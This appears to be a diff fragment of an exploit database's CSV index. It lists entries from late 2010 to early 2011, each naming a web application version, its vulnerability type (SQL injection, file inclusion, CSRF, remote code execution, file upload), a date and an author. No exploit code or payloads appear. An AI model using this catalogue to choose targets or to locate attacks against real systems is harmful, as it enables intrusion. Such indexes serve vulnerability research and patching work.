+15791,exploits/php/webapps/15791.txt,"Joomla! Component JotLoader 2.2.1 - Local File Inclusion",2010-12-20,v3n0m,webapps,php, +15793,exploits/php/webapps/15793.txt,"Vacation Rental Script 4.0 - Arbitrary File Upload",2010-12-20,Br0ly,webapps,php, +15795,exploits/php/webapps/15795.txt,"S9Y Serendipity 1.5.4 - Arbitrary File Upload",2010-12-21,pentesters.ir,webapps,php, +15797,exploits/php/webapps/15797.txt,"Hycus CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",webapps,php, +15798,exploits/php/webapps/15798.txt,"Injader CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",webapps,php, +15799,exploits/php/webapps/15799.txt,"Habari Blog - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",webapps,php, +15800,exploits/php/webapps/15800.txt,"html-edit CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",webapps,php, +15801,exploits/php/webapps/15801.txt,"Joomla! Component com_xgallery 1.0 - Local File Inclusion",2010-12-21,KelvinX,webapps,php, +15804,exploits/php/webapps/15804.txt,"jobappr 1.4 - Multiple Vulnerabilities",2010-12-21,giudinvx,webapps,php, +15807,exploits/cgi/webapps/15807.txt,"Mitel AWC - Unauthenticated Command Execution",2010-12-22,Procheckup,webapps,cgi, +15808,exploits/php/webapps/15808.txt,"WordPress Plugin Accept Signups 0.1 - Cross-Site Scripting",2010-12-22,clshack,webapps,php, +15810,exploits/hardware/webapps/15810.txt,"D-Link WBR-1310 - Authentication Bypass",2010-12-23,"Craig Heffner",webapps,hardware, +15811,exploits/php/webapps/15811.txt,"Built2Go PHP Shopping - SQL Injection",2010-12-23,Br0ly,webapps,php, +15812,exploits/php/webapps/15812.txt,"Ypninc Realty Classifieds - SQL Injection",2010-12-23,Br0ly,webapps,php, +15813,exploits/php/webapps/15813.txt,"IPN Development Handler 2.0 - Multiple Vulnerabilities",2010-12-23,AtT4CKxT3rR0r1ST,webapps,php, +15814,exploits/php/webapps/15814.txt,"Joomla! Component com_ponygallery - Remote File Inclusion",2010-12-23,AtT4CKxT3rR0r1ST,webapps,php, +15815,exploits/php/webapps/15815.txt,"Joomla! Component com_adsmanager - Remote File Inclusion",2010-12-23,AtT4CKxT3rR0r1ST,webapps,php, +15816,exploits/php/webapps/15816.txt,"CubeCart 3.0.4 - SQL Injection",2010-12-23,Dr.NeT,webapps,php, +15818,exploits/php/webapps/15818.txt,"iDevSpot iDevCart 1.10 - Multiple Local File Inclusions",2010-12-24,v3n0m,webapps,php, +15819,exploits/php/webapps/15819.txt,"Joomla! Component com_xmovie 1.0 - Local File Inclusion",2010-12-24,KelvinX,webapps,php, +15820,exploits/php/webapps/15820.txt,"SquareCMS 0.3.1 - 'post.php' SQL Injection",2010-12-24,cOndemned,webapps,php, +15822,exploits/php/webapps/15822.html,"CubeCart 3.0.6 - Cross-Site Request Forgery (Add Admin)",2010-12-24,"P0C T34M",webapps,php, +15824,exploits/php/webapps/15824.txt,"Pligg CMS 1.1.2 - Blind SQL Injection / Cross-Site Scripting",2010-12-25,"Michael Brooks",webapps,php, +15825,exploits/php/webapps/15825.txt,"openauto 1.6.3 - Multiple Vulnerabilities",2010-12-25,"Michael Brooks",webapps,php, +15826,exploits/php/webapps/15826.txt,"Traidnt Up 3.0 - Cross-Site Request Forgery",2010-12-25,"P0C T34M",webapps,php, +15827,exploits/php/webapps/15827.txt,"Joomla! Component com_idoblog - SQL Injection",2010-12-25,NOCKAR1111,webapps,php, +15828,exploits/php/webapps/15828.txt,"Vacation Rental Script 4.0 - Cross-Site Request Forgery",2010-12-25,OnurTURKESHAN,webapps,php, +15838,exploits/php/webapps/15838.php,"OpenClassifieds 1.7.0.3 - Chained: Captcha Bypass / SQL Injection / Persistent Cross-Site Scripting on FrontPage",2010-12-28,"Michael Brooks",webapps,php, +15830,exploits/php/webapps/15830.txt,"Social Engine 4.x (Music Plugin) - Arbitrary File Upload",2010-12-25,MyDoom,webapps,php, +15831,exploits/php/webapps/15831.txt,"LoveCMS 1.6.2 Final - Multiple Local File Inclusions",2010-12-25,cOndemned,webapps,php, +15832,exploits/php/webapps/15832.txt,"Interact 2.4.1 - SQL Injection",2010-12-26,"IR Security",webapps,php, +15835,exploits/php/webapps/15835.html,"pecio CMS 2.0.5 - Cross-Site Request Forgery (Add Admin)",2010-12-27,"P0C T34M",webapps,php, +15836,exploits/php/webapps/15836.txt,"OpenEMR 3.2.0 - SQL Injection / Cross-Site Scripting",2010-12-27,blake,webapps,php, +15837,exploits/php/webapps/15837.txt,"Web@all 1.1 - Remote Admin Settings Change",2010-12-27,"Giuseppe D'Inverno",webapps,php, +15840,exploits/php/webapps/15840.txt,"ardeaCore 2.25 - PHP Framework Remote File Inclusion",2010-12-29,n0n0x,webapps,php, +15843,exploits/php/webapps/15843.txt,"News Script PHP Pro - 'FCKeditor' Arbitrary File Upload",2010-12-29,Net.Edit0r,webapps,php, +15846,exploits/php/webapps/15846.txt,"kaibb 1.0.1 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",webapps,php, +15847,exploits/php/webapps/15847.txt,"DzTube - SQL Injection",2010-12-29,"errnick qwe",webapps,php, +15848,exploits/php/webapps/15848.txt,"PHP-AddressBook 6.2.4 - 'group.php' SQL Injection",2010-12-29,hiphop,webapps,php, +15849,exploits/php/webapps/15849.txt,"LoveCMS 1.6.2 - Cross-Site Request Forgery / Code Injection",2010-12-29,hiphop,webapps,php, +15850,exploits/php/webapps/15850.html,"PiXie CMS 1.04 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-12-29,"Ali Raheem",webapps,php, +15852,exploits/php/webapps/15852.txt,"Siteframe CMS 3.2.3 - 'user.php' SQL Injection",2010-12-29,"AnGrY BoY",webapps,php, +15853,exploits/php/webapps/15853.txt,"DGNews 2.1 - SQL Injection",2010-12-29,kalashnikov,webapps,php, +15856,exploits/php/webapps/15856.php,"TYPO3 - Unauthenticated Arbitrary File Retrieval",2010-12-29,ikki,webapps,php, +15857,exploits/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,webapps,php, +15858,exploits/php/webapps/15858.txt,"WordPress 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 / NS8.1)",2010-12-29,Saif,webapps,php, +15863,exploits/php/webapps/15863.txt,"LightNEasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",webapps,php, +15864,exploits/php/webapps/15864.txt,"Ignition 1.3 - 'page.php' Local File Inclusion",2010-12-30,cOndemned,webapps,php, +15865,exploits/php/webapps/15865.php,"Ignition 1.3 - Remote Code Execution",2010-12-30,cOndemned,webapps,php, +15915,exploits/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - Cross-Site Scripting / Remote Code Execution",2011-01-05,mr_me,webapps,php, +15886,exploits/php/webapps/15886.txt,"KLINK - SQL Injection",2011-01-01,"Mauro Rossi & Andres Gomez",webapps,php, +15887,exploits/php/webapps/15887.txt,"ChurchInfo 1.2.12 - SQL Injection",2011-01-01,dun,webapps,php, +15889,exploits/php/webapps/15889.txt,"Sahana Agasti 0.6.4 - SQL Injection",2011-01-01,dun,webapps,php, +15890,exploits/php/webapps/15890.txt,"Tech Shop Technote 7 - SQL Injection",2011-01-01,MaJ3stY,webapps,php, +15891,exploits/php/webapps/15891.txt,"GALLARIFIC PHP Photo Gallery Script - 'gallery.php' SQL Injection",2011-01-02,AtT4CKxT3rR0r1ST,webapps,php, +15892,exploits/php/webapps/15892.html,"YourTube 1.0 - Cross-Site Request Forgery (Add User)",2011-01-02,AtT4CKxT3rR0r1ST,webapps,php, +15893,exploits/php/webapps/15893.py,"amoeba CMS 1.01 - Multiple Vulnerabilities",2011-01-02,mr_me,webapps,php, +15896,exploits/php/webapps/15896.txt,"Sahana Agasti 0.6.4 - Multiple Remote File Inclusions",2011-01-03,n0n0x,webapps,php, +15902,exploits/php/webapps/15902.html,"S40 CMS 0.4.1 - Cross-Site Request Forgery (Change Admin Password)",2011-01-04,pentesters.ir,webapps,php, +15907,exploits/php/webapps/15907.txt,"Nucleus 3.61 - Multiple Remote File Inclusions",2011-01-05,n0n0x,webapps,php, +15913,exploits/php/webapps/15913.pl,"PhpGedView 4.2.3 - Local File Inclusion",2011-01-05,dun,webapps,php, +15961,exploits/php/webapps/15961.txt,"TinyBB 1.2 - SQL Injection",2011-01-10,Aodrulez,webapps,php, +15918,exploits/jsp/webapps/15918.txt,"Openfire 3.6.4 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-01-06,"Riyaz Ahemed Walikar",webapps,jsp, +15920,exploits/php/webapps/15920.txt,"F3Site 2011 alfa 1 - Cross-Site Scripting / Cross-Site Request Forgery",2011-01-06,"High-Tech Bridge SA",webapps,php, +15921,exploits/php/webapps/15921.txt,"phpMySport 1.4 - SQL Injection / Authentication Bypass / Full Path Disclosure",2011-01-06,"High-Tech Bridge SA",webapps,php, +15922,exploits/php/webapps/15922.txt,"Phenotype CMS 3.0 - SQL Injection",2011-01-06,"High-Tech Bridge SA",webapps,php, +15923,exploits/php/webapps/15923.txt,"PHP MicroCMS 1.0.1 - Cross-Site Request Forgery / Cross-Site Scripting",2011-01-06,"High-Tech Bridge SA",webapps,php, +15924,exploits/php/webapps/15924.txt,"openSite 0.2.2 Beta - Local File Inclusion",2011-01-07,n0n0x,webapps,php, +15938,exploits/php/webapps/15938.txt,"axdcms-0.1.1 - Local File Inclusion",2011-01-08,n0n0x,webapps,php, +15939,exploits/php/webapps/15939.txt,"Elxis CMS 2009.2 - Remote File Inclusion",2011-01-08,n0n0x,webapps,php, +15942,exploits/php/webapps/15942.txt,"sahana agasti 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,webapps,php, +15943,exploits/php/webapps/15943.txt,"WordPress Plugin mingle forum 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",webapps,php, +15945,exploits/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion",2011-01-08,"Abdi Mohamed",webapps,php, +15958,exploits/php/webapps/15958.txt,"Joomla! Plugin Captcha 4.5.1 - Local File Disclosure",2011-01-09,dun,webapps,php, +15960,exploits/php/webapps/15960.txt,"Maximus CMS 1.1.2 - 'FCKeditor' Arbitrary File Upload",2011-01-10,eidelweiss,webapps,php, +15964,exploits/php/webapps/15964.py,"Lotus CMS Fraise 3.0 - Local File Inclusion / Remote Code Execution",2011-01-10,mr_me,webapps,php, +15968,exploits/php/webapps/15968.txt,"vam shop 1.6 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",webapps,php, +15969,exploits/php/webapps/15969.txt,"diafan.cms 4.3 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",webapps,php, +15970,exploits/php/webapps/15970.txt,"Cambio 0.5a - Cross-Site Request Forgery",2011-01-11,"High-Tech Bridge SA",webapps,php, +15966,exploits/php/webapps/15966.txt,"Extcalendar 2 - 'calendar.php' SQL Injection",2011-01-11,"Lagripe-Dz & Mca-Crb",webapps,php, +15967,exploits/php/webapps/15967.txt,"energine 2.3.8 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",webapps,php, +15971,exploits/php/webapps/15971.txt,"whCMS 0.115 - Cross-Site Request Forgery",2011-01-11,"High-Tech Bridge SA",webapps,php, +15981,exploits/php/webapps/15981.txt,"LifeType 1.2.10 - HTTP Referer Persistent Cross-Site Scripting",2011-01-12,"Saif El-Sherei",webapps,php, +15979,exploits/php/webapps/15979.txt,"Joomla! 1.5.22 / 1.6.0 - 'com_mailto' Spam Mail Relay",2011-01-12,"Jeff Channell",webapps,php, +15987,exploits/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 - TCL Injection",2011-01-13,"Spencer McIntyre",webapps,cgi, +16020,exploits/php/webapps/16020.txt,"PHP Lowbids - 'viewfaqs.php' Blind SQL Injection",2011-01-20,"BorN To K!LL",webapps,php, +15989,exploits/php/webapps/15989.txt,"Joomla! Component People 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",webapps,php, +15993,exploits/php/webapps/15993.html,"ViArt Shop 4.0.5 - Cross-Site Request Forgery",2011-01-15,Or4nG.M4N,webapps,php, +15995,exploits/php/webapps/15995.txt,"glfusion CMS 1.2.1 - 'img' Persistent Cross-Site Scripting",2011-01-15,Saif,webapps,php, +15996,exploits/php/webapps/15996.txt,"CompactCMS 1.4.1 - Multiple Vulnerabilities",2011-01-15,"Patrick de Brouwer",webapps,php, +15997,exploits/jsp/webapps/15997.py,"MeshCMS 3.5 - Remote Code Execution",2011-01-16,mr_me,webapps,jsp, +15999,exploits/php/webapps/15999.txt,"BetMore Site Suite 4 - 'bid' Blind SQL Injection",2011-01-16,"BorN To K!LL",webapps,php, +16000,exploits/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent Cross-Site Scripting",2011-01-16,"Mark Stanislav",webapps,php, +16001,exploits/php/webapps/16001.txt,"Joomla! Component com_people 1.0.0 - Local File Inclusion",2011-01-16,ALTBTA,webapps,php, +16003,exploits/php/webapps/16003.txt,"AWBS 2.9.2 - 'cart.php' Blind SQL Injection",2011-01-16,ShivX,webapps,php, +16004,exploits/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon - SQL Injection",2011-01-17,Saif,webapps,php, +16006,exploits/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",webapps,cgi, +16010,exploits/php/webapps/16010.txt,"Joomla! Component allCineVid 1.0.0 - Blind SQL Injection",2011-01-18,"Salvatore Fresta",webapps,php, +16011,exploits/php/webapps/16011.txt,"CakePHP 1.3.5/1.2.8 - 'Unserialize()' File Inclusion",2011-01-18,felix,webapps,php, +16013,exploits/php/webapps/16013.html,"N-13 News 3.4 - Cross-Site Request Forgery (Admin Add)",2011-01-18,anT!-Tr0J4n,webapps,php, +17209,exploits/php/webapps/17209.txt,"SoftMP3 - SQL Injection",2011-04-24,mArTi,webapps,php, +16016,exploits/php/webapps/16016.txt,"Simploo CMS 1.7.1 - PHP Code Execution",2011-01-19,"David Vieira-Kurz",webapps,php, +16039,exploits/php/webapps/16039.txt,"Joomla! Component com_b2portfolio 1.0.0 - Multiple SQL Injections",2011-01-24,"Salvatore Fresta",webapps,php, +16018,exploits/php/webapps/16018.txt,"PHP auctions - 'viewfaqs.php' Blind SQL Injection",2011-01-19,"BorN To K!LL",webapps,php, +16019,exploits/php/webapps/16019.txt,"phpCMS 2008 - SQL Injection",2011-01-20,R3d-D3V!L,webapps,php, +16027,exploits/php/webapps/16027.txt,"phpCMS 9.0 - Blind SQL Injection",2011-01-22,eidelweiss,webapps,php, +16028,exploits/php/webapps/16028.txt,"cultbooking 2.0.4 - Multiple Vulnerabilities",2011-01-22,LiquidWorm,webapps,php, +16034,exploits/php/webapps/16034.txt,"PHP Coupon Script 6.0 - 'bus' Blind SQL Injection",2011-01-23,"BorN To K!LL",webapps,php, +16037,exploits/php/webapps/16037.html,"PHP Link Directory 4.1.0 - Cross-Site Request Forgery (Add Admin)",2011-01-23,AtT4CKxT3rR0r1ST,webapps,php, +16060,exploits/php/webapps/16060.txt,"comercioplus 5.6 - Multiple Vulnerabilities",2011-01-27,"Daniel Godoy",webapps,php, +16044,exploits/php/webapps/16044.txt,"ab Web CMS 1.35 - Multiple Vulnerabilities",2011-01-25,"Dr.0rYX & Cr3W-DZ",webapps,php, +16047,exploits/php/webapps/16047.txt,"PHPDirector Game Edition - 'game.php' SQL Injection",2011-01-26,AtT4CKxT3rR0r1ST,webapps,php, +16110,exploits/php/webapps/16110.txt,"reos 2.0.5 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",webapps,php, +16049,exploits/php/webapps/16049.txt,"AWCM 2.2 Final - Local File Inclusion",2011-01-26,Cucura,webapps,php, +16050,exploits/php/webapps/16050.txt,"class.upload.php 0.30 - Arbitrary File Upload",2011-01-26,DIES3L,webapps,php, +16051,exploits/php/webapps/16051.txt,"Froxlor 0.9.15 - Remote File Inclusion",2011-01-26,DIES3L,webapps,php, +16054,exploits/windows/webapps/16054.txt,"sap crystal report server 2008 - Directory Traversal",2011-01-26,"Dmitriy Chastuhin",webapps,windows, +16058,exploits/php/webapps/16058.txt,"MultiPowUpload 2.1 - Arbitrary File Upload",2011-01-26,DIES3L,webapps,php, +16059,exploits/php/webapps/16059.txt,"Xnova Legacies 2009.2 - Cross-Site Request Forgery",2011-01-26,"Xploit A Day",webapps,php, +16061,exploits/php/webapps/16061.txt,"PHP Link Directory Software - 'sbcat_id' SQL Injection",2011-01-28,"BorN To K!LL",webapps,php, +16062,exploits/php/webapps/16062.txt,"PHP Classified ads software - 'cid' Blind SQL Injection",2011-01-28,"BorN To K!LL",webapps,php, +16069,exploits/php/webapps/16069.txt,"PHP Script Directory Software - 'sbcat_id' SQL Injection",2011-01-28,"BorN To K!LL",webapps,php, +16074,exploits/php/webapps/16074.txt,"MultiCMS - Local File Inclusion",2011-01-29,R3VAN_BASTARD,webapps,php, +16076,exploits/php/webapps/16076.txt,"vBSEO 3.2.2/3.5.2 - Persistent Cross-Site Scripting via LinkBacks",2011-01-30,MaXe,webapps,php, +16077,exploits/php/webapps/16077.txt,"vBSEO Sitemap 2.5/3.0 - Multiple Vulnerabilities",2011-01-30,MaXe,webapps,php, +16080,exploits/php/webapps/16080.txt,"RW-Download 4.0.6 - 'index.php' SQL Injection",2011-01-30,Dr.NeT,webapps,php, +16272,exploits/php/webapps/16272.txt,"Limelight Software - 'article.php' SQL Injection",2011-03-04,eXeSoul,webapps,php, +16088,exploits/php/webapps/16088.php,"NetLink - Arbitrary File Upload",2011-02-01,lumut--,webapps,php, +16090,exploits/php/webapps/16090.txt,"TinyWebGallery 1.8.3 - Multiple Vulnerabilities",2011-02-01,"Yam Mesicka",webapps,php, +16091,exploits/php/webapps/16091.txt,"Joomla! 1.5/1.6 - JFilterInput Cross-Site Scripting Bypass",2011-02-01,"Jeff Channell",webapps,php, +16094,exploits/php/webapps/16094.txt,"Raja Natarajan Guestbook 1.0 - Local File Inclusion",2011-02-02,h0rd,webapps,php, +16096,exploits/php/webapps/16096.txt,"RedaxScript 0.3.2 - Multiple Vulnerabilities",2011-02-02,"High-Tech Bridge SA",webapps,php, +16097,exploits/php/webapps/16097.txt,"Zikula CMS 1.2.4 - Cross-Site Request Forgery",2011-02-02,"Aung Khant",webapps,php, +16102,exploits/php/webapps/16102.txt,"Islam Sound IV2 - 'details.php' SQL Injection",2011-02-03,ZxH-Labs,webapps,php, +16106,exploits/php/webapps/16106.txt,"OemPro 3.6.4 - Multiple Vulnerabilities",2011-02-03,"Ignacio Garrido",webapps,php, +16109,exploits/php/webapps/16109.txt,"Podcast Generator 1.3 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",webapps,php, +16113,exploits/php/webapps/16113.txt,"osCommerce - Authentication Bypass",2011-02-04,"Nicolas Krassas",webapps,php, +16114,exploits/php/webapps/16114.txt,"Chamilo 1.8.7 / Dokeos 1.8.6 - Remote File Disclosure",2011-02-05,beford,webapps,php, +16116,exploits/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 - Full Information Disclosure",2011-02-05,"Daniel Godoy",webapps,php, +16117,exploits/php/webapps/16117.txt,"Escort und Begleitservice Agentur Script - SQL Injection",2011-02-05,NoNameMT,webapps,php, +16122,exploits/php/webapps/16122.txt,"Dew-NewPHPLinks 2.1b - 'index.php' SQL Injection",2011-02-06,AtT4CKxT3rR0r1ST,webapps,php, +16221,exploits/php/webapps/16221.txt,"WordPress Plugin Comment Rating 2.9.23 - Multiple Vulnerabilities",2011-02-23,"High-Tech Bridge SA",webapps,php, +16127,exploits/php/webapps/16127.txt,"T-Content Managment System - Multiple Vulnerabilities",2011-02-07,"Daniel Godoy",webapps,php, +16128,exploits/php/webapps/16128.txt,"jakcms 2.0 pro rc5 - Persistent Cross-Site Scripting via useragent http header Injection",2011-02-07,"Saif El-Sherei",webapps,php, +16130,exploits/php/webapps/16130.txt,"MyMarket 1.71 - 'index.php' SQL Injection",2011-02-07,ahmadso,webapps,php, +16131,exploits/php/webapps/16131.txt,"SWFupload 2.5.0 Beta 3 - Arbitrary File Upload",2011-02-07,"Daniel Godoy",webapps,php, +16134,exploits/php/webapps/16134.txt,"Model Agentur Script - SQL Injection",2011-02-08,NoNameMT,webapps,php, +16135,exploits/php/webapps/16135.html,"dotProject 2.1.5 - Cross-Site Request Forgery",2011-02-08,"AutoSec Tools",webapps,php, +16136,exploits/php/webapps/16136.html,"AIOCP 1.4.001 - Cross-Site Request Forgery",2011-02-08,"AutoSec Tools",webapps,php, +16139,exploits/php/webapps/16139.txt,"Auto Database System 1.0 Infusion Addon - SQL Injection",2011-02-09,Saif,webapps,php, +16140,exploits/php/webapps/16140.txt,"Web 2.0 Social Network Freunde Community - SQL Injection",2011-02-09,NoNameMT,webapps,php, +16167,exploits/php/webapps/16167.txt,"jSchool Advanced - SQL Injection",2011-02-14,eXa.DisC,webapps,php, +16168,exploits/php/webapps/16168.txt,"RunCMS 2.2.2 - Multiple Vulnerabilities",2011-02-14,"High-Tech Bridge SA",webapps,php, +16143,exploits/php/webapps/16143.txt,"MihanTools Script 1.3.3 - SQL Injection",2011-02-09,WHITE_DEVIL,webapps,php, +16144,exploits/php/webapps/16144.txt,"WordPress Plugin Enable Media Replace - Multiple Vulnerabilities",2011-02-09,"Ulf Harnhammar",webapps,php, +16183,exploits/php/webapps/16183.txt,"GAzie 5.10 - 'Login' Multiple Vulnerabilities",2011-02-17,LiquidWorm,webapps,php, +16165,exploits/php/webapps/16165.txt,"AWCM 2.2 Final - Persistent Cross-Site Scripting",2011-02-14,_84kur10_,webapps,php, +16148,exploits/php/webapps/16148.txt,"SourceBans 1.4.7 - Cross-Site Scripting",2011-02-09,Sw1tCh,webapps,php, +16152,exploits/multiple/webapps/16152.py,"LocatePC 1.05 (Ligatt Version + Others) - SQL Injection",2011-02-10,anonymous,webapps,multiple, +16154,exploits/php/webapps/16154.txt,"Horde - Horde_Image::factory driver Argument Local File Inclusion",2011-02-11,skysbsb,webapps,php, +16155,exploits/php/webapps/16155.txt,"Geomi CMS 1.2/3.0 - SQL Injection",2011-02-11,"ThunDEr HeaD",webapps,php, +16156,exploits/php/webapps/16156.txt,"Kunena < 1.5.13 / < 1.6.3 - SQL Injection",2011-02-11,"Red Matter",webapps,php, +16157,exploits/jsp/webapps/16157.py,"Openedit 5.1294 - Remote Code Execution",2011-02-11,mr_me,webapps,jsp, +16158,exploits/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php, +16159,exploits/php/webapps/16159.txt,"Escort Agency CMS - Blind SQL Injection",2011-02-12,NoNameMT,webapps,php, +16160,exploits/php/webapps/16160.txt,"PixelPost 1.7.3 - Multiple POST SQL Injections",2011-02-12,LiquidWorm,webapps,php, +16170,exploits/php/webapps/16170.txt,"phpMyBitTorrent 2.0.4 - SQL Injection",2011-02-15,#forkbombers,webapps,php, +16171,exploits/cfm/webapps/16171.py,"Lingxia I.C.E CMS - Blind SQL Injection",2011-02-15,mr_me,webapps,cfm, +16172,exploits/php/webapps/16172.txt,"omegabill 1.0 build 6 - Multiple Vulnerabilities",2011-02-15,"AutoSec Tools",webapps,php, +16175,exploits/php/webapps/16175.txt,"Seo Panel 2.2.0 - SQL Injection",2011-02-15,"High-Tech Bridge SA",webapps,php, +16178,exploits/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent - SQL Injection",2011-02-16,R4dc0re,webapps,asp, +16179,exploits/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent - SQL Injection",2011-02-16,R4dc0re,webapps,asp, +16181,exploits/php/webapps/16181.txt,"WordPress Plugin User Photo Component - Arbitrary File Upload",2011-02-17,ADVtools,webapps,php, +16225,exploits/cfm/webapps/16225.txt,"Alcassoft's SOPHIA CMS - SQL Injection",2011-02-24,p0pc0rn,webapps,cfm, +16196,exploits/php/webapps/16196.txt,"eventum issue tracking system 2.3.1 - Persistent Cross-Site Scripting",2011-02-19,"Saif El-Sherei",webapps,php, +16197,exploits/php/webapps/16197.txt,"Escort Directory CMS - SQL Injection",2011-02-19,NoNameMT,webapps,php, +16198,exploits/php/webapps/16198.txt,"Independent Escort CMS - Blind SQL Injection",2011-02-19,NoNameMT,webapps,php, +16199,exploits/php/webapps/16199.txt,"Icy Phoenix 1.3.0.53a - HTTP Referer Persistent Cross-Site Scripting",2011-02-20,"Saif El-Sherei",webapps,php, +16200,exploits/php/webapps/16200.py,"JAKCMS 2.01 - Code Execution",2011-02-20,mr_me,webapps,php, +16201,exploits/php/webapps/16201.py,"JAKCMS 2.01 RC1 - Blind SQL Injection",2011-02-20,mr_me,webapps,php, +16202,exploits/php/webapps/16202.txt,"Woltlab Burning Board 2.3.6 Addon - 'hilfsmittel.php' SQL Injection",2011-02-21,Crazyball,webapps,php, +16205,exploits/asp/webapps/16205.txt,"DIY Web CMS - Multiple Vulnerabilities",2011-02-22,p0pc0rn,webapps,asp, +16206,exploits/php/webapps/16206.txt,"Galilery 1.0 - Local File Inclusion",2011-02-22,lemlajt,webapps,php, +16207,exploits/php/webapps/16207.txt,"dotProject 2.1.5 - Multiple Vulnerabilities",2011-02-22,lemlajt,webapps,php, +16222,exploits/php/webapps/16222.txt,"course registration management system 2.1 - Multiple Vulnerabilities",2011-02-23,"AutoSec Tools",webapps,php, +16223,exploits/php/webapps/16223.txt,"VidiScript - SQL Injection",2011-02-23,ThEtA.Nu,webapps,php, +16220,exploits/php/webapps/16220.py,"ProQuiz 2.0.0b - Arbitrary File Upload",2011-02-23,"AutoSec Tools",webapps,php, +16218,exploits/php/webapps/16218.txt,"WordPress Plugin Z-Vote 1.1 - SQL Injection",2011-02-23,"High-Tech Bridge SA",webapps,php, +16213,exploits/php/webapps/16213.txt,"Hyena Cart - 'index.php' SQL Injection",2011-02-23,AtT4CKxT3rR0r1ST,webapps,php, +16214,exploits/php/webapps/16214.txt,"tplSoccerStats - 'player.php' SQL Injection",2011-02-23,AtT4CKxT3rR0r1ST,webapps,php, +16217,exploits/php/webapps/16217.txt,"Bitweaver 2.8.1 - Persistent Cross-Site Scripting",2011-02-23,lemlajt,webapps,php, +16232,exploits/php/webapps/16232.txt,"WordPress Plugin GigPress 2.1.10 - Persistent Cross-Site Scripting",2011-02-24,"Saif El-Sherei",webapps,php, +16233,exploits/php/webapps/16233.txt,"WordPress Plugin Relevanssi 2.7.2 - Persistent Cross-Site Scripting",2011-02-24,"Saif El-Sherei",webapps,php, +16235,exploits/php/webapps/16235.txt,"WordPress Plugin Forum Server 1.6.5 - SQL Injection",2011-02-24,"High-Tech Bridge SA",webapps,php, +16236,exploits/php/webapps/16236.txt,"WordPress Plugin IWantOneButton 3.0.1 - Multiple Vulnerabilities",2011-02-24,"High-Tech Bridge SA",webapps,php, +16241,exploits/asp/webapps/16241.txt,"RaksoCT - Multiple SQL Injections",2011-02-25,p0pc0rn,webapps,asp, +16246,exploits/php/webapps/16246.py,"Joomla! Component com_xcloner-backupandrestore - Remote Command Execution",2011-02-25,mr_me,webapps,php, +16247,exploits/php/webapps/16247.txt,"Pragyan CMS 3.0 - Multiple Vulnerabilities",2011-02-25,"Villy & Abhishek Lyall",webapps,php, +16249,exploits/php/webapps/16249.txt,"phreebooks r30rc4 - Multiple Vulnerabilities",2011-02-26,"AutoSec Tools",webapps,php, +16250,exploits/php/webapps/16250.txt,"WordPress Plugin jQuery Mega Menu 1.0 - Local File Inclusion",2011-02-26,"AutoSec Tools",webapps,php, +16251,exploits/php/webapps/16251.txt,"WordPress Plugin OPS Old Post Spinner 2.2.1 - Local File Inclusion",2011-02-26,"AutoSec Tools",webapps,php, +16252,exploits/hardware/webapps/16252.html,"Cisco Linksys WAG120N - Cross-Site Request Forgery",2011-02-26,"Khashayar Fereidani",webapps,hardware, +16256,exploits/php/webapps/16256.txt,"DO-CMS - Multiple SQL Injections",2011-02-28,AtT4CKxT3rR0r1ST,webapps,php, +16257,exploits/php/webapps/16257.txt,"SnapProof - 'page.php' SQL Injection",2011-02-28,AtT4CKxT3rR0r1ST,webapps,php, +16265,exploits/php/webapps/16265.txt,"Readmore Systems Script - SQL Injection",2011-03-02,"vBzone & Zooka & El3arby",webapps,php, +16266,exploits/php/webapps/16266.txt,"Quicktech - SQL Injection",2011-03-02,eXeSoul,webapps,php, +16267,exploits/php/webapps/16267.txt,"Bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,webapps,php, +16268,exploits/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8/3.7.x - SQL Injection",2011-03-02,DSecurity,webapps,php, +16273,exploits/php/webapps/16273.php,"WordPress Plugin PHP Speedy 0.5.2 - 'admin_container.php' Remote Code Execution",2011-03-04,mr_me,webapps,php, +16274,exploits/jsp/webapps/16274.pl,"JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Command Execution",2011-03-04,kingcope,webapps,jsp, +16276,exploits/php/webapps/16276.txt,"ADAN Neuronlabs - 'view.php' SQL Injection",2011-03-04,IRAQ_JAGUAR,webapps,php, +16279,exploits/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,AtT4CKxT3rR0r1ST,webapps,php, +16280,exploits/php/webapps/16280.py,"vTiger CRM 5.0.4 - Unauthenticated Local File Inclusion",2011-03-05,TecR0c,webapps,php, +16281,exploits/php/webapps/16281.txt,"BoutikOne - 'description.php' SQL Injection",2011-03-05,IRAQ_JAGUAR,webapps,php, 